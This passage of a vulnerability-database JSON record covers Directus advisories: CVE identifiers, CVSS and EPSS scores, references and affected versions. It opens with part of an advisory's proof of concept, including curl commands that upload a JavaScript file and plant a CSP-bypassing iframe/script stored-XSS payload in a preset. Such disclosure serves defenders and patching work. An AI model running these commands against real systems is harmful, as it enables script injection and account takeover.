\"file=@-;type=application/x-javascript;filename=poc.js\" | jq -r \".data.id\")\n```\n\n2. Create a preset for a collection and store the preset ID.\n\nOr use a preset already created from GET /presets. The following example uses the direct_users preset.\n\n```\nattacker_user_id=$(curl -s -k \"${TARGET_HOST}/users/me\" \\ -b \"${root_dir}/static/attacker_directus_session_token\" | jq -r \".data.id\") curl -i -s -k -X 'POST' \"${TARGET_HOST}/presets\" \\ -H 'Content-Type: application/json' \\ -b \"${root_dir}/static/attacker_directus_session_token\" \\ --data-binary \"{\\\"layout\\\":\\\"cards\\\",\\\"bookmark\\\":null,\\\"role\\\":null,\\\"user\\\":\\\"${attacker_user_id}\\\",\\\"search\\\":null,\\\"filter\\\":null,\\\"layout_query\\\":{\\\"cards\\\":{\\\"sort\\\":[\\\"email\\\"]}},\\\"layout_options\\\":{\\\"cards\\\":{\\\"icon\\\":\\\"account_circle\\\",\\\"title\\\":\\\"<iframe srcdoc=\\\\\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\\\\\">\\\",\\\"subtitle\\\":\\\"{{ email }}\\\",\\\"size\\\":4}},\\\"refresh_interval\\\":null,\\\"icon\\\":\\\"bookmark\\\",\\\"color\\\":null,\\\"collection\\\":\\\"directus_users\\\"}\"\n```\n\nWhen the user visits the view that uses the directus_users preset, the JavaScript file will be executed.\n\nNotes:\n\nNeed to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is `<iframe srcdoc=\\\"<script src='URL_MALICIOUS_FILE'> </script>\\\">`.\n\nWe can target any collection that uses the vulnerable template structure that renders the layout option section.\n\nIn this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-9qrm-48qf-r2rw"},{"reference_url":"https://github.com/advisories/GHSA-9qrm-48qf-r2rw","reference_id":"GHSA-9qrm-48qf-r2rw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9qrm-48qf-r2rw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/193996?format=json","purl":"pkg:npm/directus@11.3.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.3.3"}],"aliases":["GHSA-9qrm-48qf-r2rw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wgag-36wa-qyay"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/306030?format=json","vulnerability_id":"VCID-wn2j-dtpz-hye1","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53887","reference_id":"","reference_type":"","scores":[{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54927","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53887"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/commit/e74f3e4e92edc33b5f83eefb001a3d2a85af17a3"},{"reference_url":"https://github.com/directus/directus/pull/25353","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/pull/25353"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-rmjh-cf9q-pv7q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53887","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53887"},{"reference_url":"https://github.com/advisories/GHSA-rmjh-cf9q-pv7q","reference_id":"GHSA-rmjh-cf9q-pv7q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-rmjh-cf9q-pv7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/195594?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53887","GHSA-rmjh-cf9q-pv7q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wn2j-dtpz-hye1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/264506?format=json","vulnerability_id":"VCID-xt9c-32g5-mqes","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45596","reference_id":"","reference_type":"","scores":[{"value":"0.00753","scoring_system":"epss","scoring_elements":"0.73508","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45596"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428"},{"reference_url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459"},{"reference_url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b"},{"reference_url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45596","reference_id":"CVE-2024-45596","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45596"},{"reference_url":"https://github.com/advisories/GHSA-cff8-x7jv-4fm8","reference_id":"GHSA-cff8-x7jv-4fm8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cff8-x7jv-4fm8"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8","reference_id":"GHSA-cff8-x7jv-4fm8","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-10T19:20:20Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82736?format=json","purl":"pkg:npm/directus@10.13.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.3"},{"url":"http://public2.vulnerablecode.io/api/packages/82738?format=json","purl":"pkg:npm/directus@11.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-bjzg-mzjf-cfau"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-w1ph-v2n1-nbby"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.1.0"}],"aliases":["CVE-2024-45596","GHSA-cff8-x7jv-4fm8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xt9c-32g5-mqes"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330170?format=json","vulnerability_id":"VCID-xtcw-1jv1-s7ax","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35410","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03706","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35410"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:25Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35410","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35410"},{"reference_url":"https://github.com/advisories/GHSA-cf45-hxwj-4cfj","reference_id":"GHSA-cf45-hxwj-4cfj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cf45-hxwj-4cfj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188455?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35410","GHSA-cf45-hxwj-4cfj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xtcw-1jv1-s7ax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/330980?format=json","vulnerability_id":"VCID-y1vf-15p4-rfca","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39942","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12292","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39942"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.17.0","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.17.0"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39942","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39942"},{"reference_url":"https://github.com/advisories/GHSA-393c-p46r-7c95","reference_id":"GHSA-393c-p46r-7c95","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-393c-p46r-7c95"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/188807?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-39942","GHSA-393c-p46r-7c95"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y1vf-15p4-rfca"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/341112?format=json","vulnerability_id":"VCID-yutw-33sk-5fg3","summary":"Duplicate Advisory: Improper access control in Directus","references":[{"reference_url":"https://directus.io","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://directus.io"},{"reference_url":"https://fluidattacks.com/advisories/capaldi","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://fluidattacks.com/advisories/capaldi"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534","reference_id":"CVE-2024-6534","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534"},{"reference_url":"https://github.com/advisories/GHSA-q83v-hq3j-4pq3","reference_id":"GHSA-q83v-hq3j-4pq3","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q83v-hq3j-4pq3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82574?format=json","purl":"pkg:npm/directus@10.13.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp82-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.1"}],"aliases":["GHSA-q83v-hq3j-4pq3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yutw-33sk-5fg3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/257013?format=json","vulnerability_id":"VCID-yz34-qwam-wbcn","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-36128","reference_id":"","reference_type":"","scores":[{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57894","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-36128"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI: